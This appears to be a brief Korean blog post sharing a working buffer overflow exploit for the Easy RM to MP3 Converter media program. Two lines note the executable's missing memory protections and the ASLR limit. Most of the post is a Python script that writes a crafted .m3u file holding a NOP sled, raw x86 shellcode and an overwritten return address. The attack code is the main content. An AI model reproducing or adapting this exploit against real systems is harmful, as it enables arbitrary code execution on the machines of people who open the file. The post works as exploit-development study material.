Easy RM Convert MP3 Exploit

엄청쉽다 그냥 다른 dll에만 보호기법이있지 해당 exe에는 보호기법이없어서 익스가 참 쉬웠어요

단점이라고 치면.. dll에서 jmp esp가젯을 못쓴다는점 ㅠㅠ(ASLR)

import struct
import os,sys,time
from subprocess import *
p = lambda x:struct.pack("<L",x)
up = lambda x:struct.unpack("<L",x)




shellcode = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x69\x21\x21\x01\x68\x67\x73\x61\x72\x68\x20\x73\x30\x6e\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"
jmpesp = 0x385f23a

payload = "\x90"*20000
payload += shellcode
payload += "\x90"*(26086-len(payload))
payload += p(0x15a434)
f = open("test.m3u","w")
f.write(payload)
f.close()